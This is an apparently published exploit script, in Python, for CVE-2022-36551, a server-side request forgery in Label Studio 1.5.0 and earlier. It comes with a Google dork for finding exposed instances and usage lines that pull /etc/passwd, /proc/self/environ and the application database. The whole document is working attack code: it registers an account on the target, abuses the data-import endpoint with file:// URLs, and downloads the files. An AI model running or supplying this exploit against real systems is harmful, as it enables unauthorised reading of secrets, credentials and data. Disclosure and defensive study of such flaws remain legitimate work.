# Exploit Title: Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)
# Google Dork: intitle:"Label Studio" intext:"Sign Up" intext:"Welcome to Label Studio Community Edition"
# Date: 2022-10-03
# Exploit Author: @DeveloperNinja, IncisiveSec@protonmail.com
# Vendor Homepage: https://github.com/heartexlabs/label-studio, https://labelstud.io/
# Software Link: https://github.com/heartexlabs/label-studio/releases
# Version: <=1.5.0
# CVE : CVE-2022-36551
# Docker Container: heartexlabs/label-studio
# Server Side Request Forgery (SSRF) in the Data Import module in Heartex - Label Studio Community Edition
# versions 1.5.0 and earlier allows an authenticated user to access arbitrary files on the system.
# Furthermore, self-registration is enabled by default in these versions of Label Studio enabling a remote
# attacker to create a new account and then exploit the SSRF.
#
# This exploit has been tested on Label Studio 1.5.0
#
# Exploit Usage Examples (replace with your target details):
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /etc/passwd
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /proc/self/environ
# - python3 exploit.py --url http://localhost:8080/ --username "user@example.com" --password 12345678 --register --file /label-studio/data/label_studio.sqlite3 --out label_studio.sqlite3.sqlite3
import json
import argparse
import requests
import shutil
from urllib.parse import urljoin
from urllib.parse import urlparse
requests.packages.urllib3.disable_warnings()
# main function for exploit
def main(url, filePath, writePath, username, password, shouldRegister):
# check if the URL is reachable
try:
r = requests.get(url, verify=False)
if r.status_code == 200:
print("[+] URL is reachable")
else:
print("[!] Error: URL is not reachable, check the URL and try again")
exit(1)
except requests.exceptions.RequestException as e:
print("[!] Error: URL is not reachable, check the URL and try again")
exit(1)
session = requests.Session()
login(session, url, username, password, shouldRegister)
print("[+] Logged in")
print("[+] Creating project...")
# Create a temp project
projectDetails = create_project(session, url)
print("[+] Project created, ID: {}".format(projectDetails["id"]))
#time for the actual exploit, import a "file" to the newly created project (IE: file:///etc/passwd, or file:///proc/self/environ)
print("[+] Attempting to fetch: {}".format(filePath))
fetch_file(session, url, projectDetails["id"], filePath, writePath)
print("[+] Deleting Project.. {}".format(projectDetails["id"]))
delete_project(session, url, projectDetails["id"])
print("[+] Project Deleted")
print("[*] Finished executing exploit")
# login, logs the user in
def login(session, url, username, password, shouldRegister):
# hit the main page first to get the CSRF token set
r = session.get(url, verify=False)
r = session.post(
urljoin(url, "/user/login"),
data={
"email": username,
"password": password,
"csrfmiddlewaretoken": session.cookies["csrftoken"],
},
verify=False
)
if r.status_code == 200 and r.text.find("The email and password you entered") < 0:
return
elif r.text.find("The email and password you entered") > 0 and shouldRegister:
print("[!] Account does not exist, registering...")
r = session.post(
urljoin(url, "/user/signup/"),
data={
"email": username,
"password": password,
"csrfmiddlewaretoken": session.cookies["csrftoken"],
'allow_newsletters': False,
},
)
if r.status_code == 302:
# at this point the system automatically logs you in (assuming self-registration is enabled, which it is by default)
return
else:
print("[!] Error: Could not login, check the credentials and try again")
exit(1)
# create_project creates a temporary project for exploiting the SSRF
def create_project(session, url):
r = session.post(
urljoin(url, "/api/projects"),
data={
"title": "TPS Report Finder",
},
verify=False
)
if r.status_code == 200 or r.status_code == 201:
return r.json()
else:
print("[!] Error: Could not create project, check your credentials / permissions")
exit(1)
def fetch_file(session, url, projectId, filePath, writePath):
# if scheme is empty prepend file://
parsedFilePath = urlparse(filePath)
if parsedFilePath.scheme == "":
filePath = "file://" + filePath
headers = {
'Content-Type': 'application/x-www-form-urlencoded'
}
url = urljoin(url, "/api/projects/{}/import".format(projectId))
r = session.post(url,
data={
"url": filePath, # This is the main vulnerability, there is no restriction on the "schema" of the provided URL
},
headers=headers,
verify=False
)
if r.status_code == 201:
# file found! -- first grab the file path details
fileId = r.json()["file_upload_ids"][0]
r = session.get(urljoin(url, "/api/import/file-upload/{}".format(fileId)), headers=headers, verify=False)
r = session.get(urljoin(url, "/data/{}".format(r.json()["file"])), headers=headers, verify=False, stream=True)
print("[+] File found!")
# if user wants to write to disk, make it so
if writePath != None:
print("[+] Writing to {}".format(writePath))
# write the file to disk
with open(writePath, 'wb') as handle:
shutil.copyfileobj(r.raw, handle)
handle.close()
return
else:
print("==========================================================")
print(r.text)
print("==========================================================")
return
else:
print("[!] Error: Could not fetch file, it's likely the file path doesn't exist: ")
print("\t" + r.json()["validation_errors"]["non_field_errors"][0])
return
def delete_project(session, url, projectId):
url = urljoin(url, "/api/projects/{}".format(projectId))
r = session.delete(url, verify=False)
if r.status_code == 200 or r.status_code == 204:
return
else:
print( "[!] Error: Could not delete project, check your credentials / permissions")
exit(1)
parser = argparse.ArgumentParser()
parser.add_argument("--url", required=True, help="Label Studio URL")
parser.add_argument("--file", required=True, help="Path to the file you want to fetch")
parser.add_argument("--out", required=False, help="Path to write the file.If omitted will be written to STDOUT")
parser.add_argument("--username", required=False, help="Username for existing account (email)")
parser.add_argument("--password", required=False, help="Password for existing account")
parser.add_argument("--register", required=False, action=argparse.BooleanOptionalAction, help="Register user if it doesn't exist",
)
args = parser.parse_args()
main(args.url, args.file, args.out, args.username, args.password, args.register)